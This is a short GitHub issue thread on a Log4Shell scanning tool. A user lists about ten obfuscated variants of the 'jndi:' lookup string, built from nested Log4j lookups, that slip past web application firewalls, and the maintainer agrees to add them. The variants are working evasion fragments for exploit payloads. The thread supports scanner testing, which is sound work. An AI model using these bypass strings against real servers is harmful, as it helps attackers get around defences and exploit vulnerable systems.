### ISSUE TITLE
JNDI: WAF Bypass

### ISSUE THREAD

**Issue by abdilahrf** [whwlsfb/Log4j2Scan#11]
jndi:
jn${env::-}di:
jn${date:}di${date:':'}

j${k8s:k5:-ND}i${sd:k5:-:}
j${main:\k5:-Nd}i${spring:k5:-:}
j${sys:k5:-nD}${lower:i${web:k5:-:}}
j${::-nD}i${::-:}
j${EnV:K5:-nD}i:
j${loWer:Nd}i${uPper::}

I think its time to add more waf bypass since jndi: part most likely blocked by waf right now
https://twitter.com/ymzkei5/status/1469765165348704256

**Comment by whwlsfb** [comment]
thx! I will add them in a future version.
